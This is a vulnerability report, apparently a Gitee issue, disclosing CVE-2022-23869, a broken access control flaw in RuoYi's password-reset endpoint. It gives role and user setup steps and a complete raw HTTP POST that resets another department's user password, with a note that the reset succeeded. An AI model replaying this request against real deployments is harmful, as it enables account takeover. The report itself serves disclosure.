CVE-2022-23869: Broken Access Control Vulnerability · Issue #I4RCO2 · 若依/RuoYi - Gitee.com

In the WebUI, user test1 does not have permission to reset the password of user test3, but the password of user test3 can be reset through the /system/user/resetPwd request.

Choose “System Management”- > “Role Management”(“系统管理”->”角色管理”) , and add the role of “testrole”.

Set “Menu Permission” (“菜单权限”) as follows:

“Data Permission”- > “Data Scope” (“数据权限”->“数据范围”) is set to “ Data Permission of the department”(“本部门数据权限”).

Add a user named test1, and the userId is 100. Add a user named test3, and the userId is 102.

The “Home Department” (“归属部门”) of user test1 is “ Marketing Department” (“市场部门”), and the “Role” ( “角色”) is testrole.

The “Home Department” (“归属部门”) of user test3 is “Financial Department” (“财务部门”), and the “Role” (“角色”) is testrole.

After logging in to the system, user test1 can see only user test1 of the “marketing department”(“市场部门”), but not user test3 of the “financial department”(“财务部门”).

The WebUI provides the “password reset”(“重置密码”) function. Invoke the resetPwd interface through the cookie of user test1 to reset the password of user test3. The request parameters of user test3 are userId=102 and loginName=test3.

POST /system/user/resetPwd HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 42
Origin: http://localhost:8090
Connection: close
Referer: http://localhost:8090/system/user/resetPwd/100
Cookie: nav-style=default; JSESSIONID=xxxxxxx
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

userId=102&loginName=test3&password=123456

The password of user test3 was reset successfully.